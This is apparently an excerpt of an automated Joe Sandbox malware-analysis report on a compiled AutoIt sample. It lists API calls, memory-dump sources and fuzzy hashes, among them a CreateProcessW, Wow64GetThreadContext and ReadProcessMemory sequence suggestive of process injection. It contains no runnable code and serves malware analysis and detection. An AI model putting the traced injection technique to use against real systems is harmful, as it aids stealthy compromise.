• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: __filbuf__getptd_noexit__read_memcpy_s
• String ID:
• API String ID: 1794320848-0
APIs
• GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
• TerminateProcess.KERNEL32(00000000), ref: 004753CE
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Process$CurrentTerminate
• String ID:
• API String ID: 2429186680-0
                                                                                                                                                                                                                • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                                                                                                                • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: IconNotifyShell_
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1144537725-0
                                                                                                                                                                                                                • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                                                                                                                • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _malloc.LIBCMT ref: 0043214B
                                                                                                                                                                                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                                                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                                                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                                                                                • _malloc.LIBCMT ref: 0043215D
                                                                                                                                                                                                                • _malloc.LIBCMT ref: 0043216F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 680241177-0
                                                                                                                                                                                                                • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                                                                                                                                • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                                                                                                                                • _free.LIBCMT ref: 004295A0
                                                                                                                                                                                                                  • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                                                                                                                  • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                                                                                                                  • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                                                                                                                                  • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                                                                                                                                  • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                                                                                                                                  • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                                                                                                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                                                                                                • API String ID: 3938964917-2806939583
                                                                                                                                                                                                                • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                                                                                                                                • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _strcat
                                                                                                                                                                                                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                                                                                                • API String ID: 1765576173-2684727018
                                                                                                                                                                                                                • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                                                                                                                                • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                                                                                                • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                                                                                                                                • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 004678F7
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast__wsplitpath_malloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4163294574-0
                                                                                                                                                                                                                • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                                                                                                                                • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                                                                                                                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                                                                                                                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                                                                                                                                                • _strcat.LIBCMT ref: 0040F786
                                                                                                                                                                                                                  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                                                                                                                                                  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3199840319-0
                                                                                                                                                                                                                • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                                                                                                                                                • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeInfoLibraryParametersSystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3403648963-0
                                                                                                                                                                                                                • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                                                                                                                • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                                                                                                                • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
APIs
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
• __lock_file.LIBCMT ref: 00414A8D
  • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
• __fclose_nolock.LIBCMT ref: 00414A98
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
• Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
• Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
• Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
• Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
APIs
• __lock_file.LIBCMT ref: 00415012
• __ftell_nolock.LIBCMT ref: 0041501F
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: __ftell_nolock__getptd_noexit__lock_file
• String ID:
• API String ID: 2999321469-0
• Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
• Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
• Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
• Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 040DDA9B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040DDB31
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040DDB53
Memory Dump Source
• Source File: 00000000.00000002.1675230613.00000000040DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 040DC000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40dc000_N2Qncau2rN.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
• Instruction ID: efb79f22e0bb4b5b5d9a995a5e1eda386f045b9f72c6aa3b5ade42cf83ff56af
• Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
• Instruction Fuzzy Hash: C212EF24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A4E77A5F85CF5A
APIs
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
